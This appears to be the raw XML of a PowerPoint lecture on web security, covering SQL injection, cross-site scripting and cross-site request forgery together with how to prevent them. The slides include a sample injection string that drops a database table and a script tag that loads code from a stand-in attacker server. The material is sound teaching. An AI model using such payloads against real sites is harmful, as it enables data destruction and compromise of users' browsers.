              <a:t>$_RESULT["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>"] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>"'")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Evil user sends </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = "x'; drop table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mytable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;"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Your silly program executes…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>mytable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>mycolumn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> = 'x'; drop table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>mytable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>;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Poof, no more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36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Preventing SQL injection attack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Option #1: Validate all inputs, reject evil inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>Regexps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> work pretty well on numbers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Option </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>#2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Use prepared statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>No need to concatenate </a:t>
            </a:r>
          </a:p>
          <a:p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5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HTML/JS injection attack</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DO NOT COPY-PASTE THIS CODE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en-US" dirty="0"/>
              <a:t>Or, suppose our evil person has sent this evil tweet: message equal to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sz="2600" dirty="0"/>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>www.myevilserver.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>warez.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>"&gt;&lt;/script&gt;</a:t>
            </a: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What happens:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This script gets written into the list of tweets. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The current user's browser runs this nasty little script DIRECTLY off of the other server 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dirty="0"/>
              <a:t>Also known as "cross-site scripting attack" (XSS)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dirty="0"/>
              <a:t>Can also be accomplished with an &lt;iframe&gt; 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dirty="0"/>
              <a:t>Continue attack in same manner as before…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But oh, the evils of "cross-site scripting" can be bad in so many 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altLang="en-US" dirty="0"/>
              <a:t>Potential consequences of cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Stealing data from the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Confidentiality fail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Submitting forms on the user's behalf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>E.g., by clicking buttons on the page: integrity fail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Downloading code to the user's computer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>E.g., by taking advantage of unpatched security holes in the user's browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" alt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44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You don't believe that browsers are vulnerable?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flaws are legion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>tinyurl.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>cve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>-flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>tinyurl.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>/chrome-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>cve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>-flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>tinyurl.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>cve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>-flaws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There are plenty of sites ready and waiting to download nasty code to your laptop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Be very careful where you surf on the web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257788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once Dr. Evil has taken over the user's computer…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11072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Install a virus that reads everything on the user's computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Including credit card numbers and passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Then tells your user's computer to attack other computers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Making your user's computer into a bot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>And encrypts your data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Requiring you to pay a ransom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>And finally deletes everything on the machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Leaving a smoldering ruin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="x-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86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1176</TotalTime>
  <Words>2047</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>292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Calibri</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Berlin</vt:lpstr>
      <vt:lpstr>Security</vt:lpstr>
      <vt:lpstr>Injection attacks</vt:lpstr>
      <vt:lpstr>Structure of an injection attack</vt:lpstr>
      <vt:lpstr>Example: SQL injection attack DO NOT COPY-PASTE THIS CODE</vt:lpstr>
      <vt:lpstr>Preventing SQL injection attack</vt:lpstr>
      <vt:lpstr>Example: HTML/JS injection attack DO NOT COPY-PASTE THIS CODE</vt:lpstr>
      <vt:lpstr>But oh, the evils of "cross-site scripting" can be bad in so many ways</vt:lpstr>
      <vt:lpstr>You don't believe that browsers are vulnerable?</vt:lpstr>
      <vt:lpstr>And once Dr. Evil has taken over the user's computer…</vt:lpstr>
      <vt:lpstr>Example from real life</vt:lpstr>
      <vt:lpstr>Summary of what happens when you don't protect your users</vt:lpstr>
      <vt:lpstr>Preventing HTML/JS injection (including XSS attacks)</vt:lpstr>
      <vt:lpstr>Preventing SQL injection</vt:lpstr>
      <vt:lpstr>Strategy for fighting injection attacks</vt:lpstr>
      <vt:lpstr>Alternate option for preventing injection</vt:lpstr>
      <vt:lpstr>Clean data just after arrival… Not always easy</vt:lpstr>
      <vt:lpstr>Common scenario: Posting data from the client to the server (form submission)</vt:lpstr>
      <vt:lpstr>Ultra-simple client-side validation</vt:lpstr>
      <vt:lpstr>Simple validation with jQuery</vt:lpstr>
      <vt:lpstr>jquery.validate.js</vt:lpstr>
      <vt:lpstr>Validation on the server</vt:lpstr>
      <vt:lpstr>Cross-site request forgery attack</vt:lpstr>
      <vt:lpstr>How CSRF works</vt:lpstr>
      <vt:lpstr>Key points</vt:lpstr>
      <vt:lpstr>"Send commands to your site"?</vt:lpstr>
      <vt:lpstr>What happens then…</vt:lpstr>
      <vt:lpstr>Even worse: Making the attack invisible</vt:lpstr>
      <vt:lpstr>Even worse: Damaging lots of data</vt:lpstr>
      <vt:lpstr>Even worse: Combine with XSS</vt:lpstr>
      <vt:lpstr>Preventing CSRF is a huge pain</vt:lpstr>
      <vt:lpstr>Option #1: Use very short sessions</vt:lpstr>
      <vt:lpstr>Option #2: Always check the referer</vt:lpstr>
      <vt:lpstr>Option #2: Always check the referer</vt:lpstr>
      <vt:lpstr>Option #2: Always check the referer</vt:lpstr>
      <vt:lpstr>Option #3: Require a custom http header</vt:lpstr>
      <vt:lpstr>Option #3: Require a custom http header</vt:lpstr>
      <vt:lpstr>Option #4: Create a special token that must be present </vt:lpstr>
      <vt:lpstr>Option #4: Create a special token that must be present </vt:lpstr>
      <vt:lpstr>Summary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Virajitha Karnatapu</dc:creator>
  <cp:lastModifiedBy>Virajitha Karnatapu</cp:lastModifiedBy>
  <cp:revision>110</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-07-23T05:29:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-08-15T18:53:12Z</dcterms:modified>
</cp:coreProperties>
</file>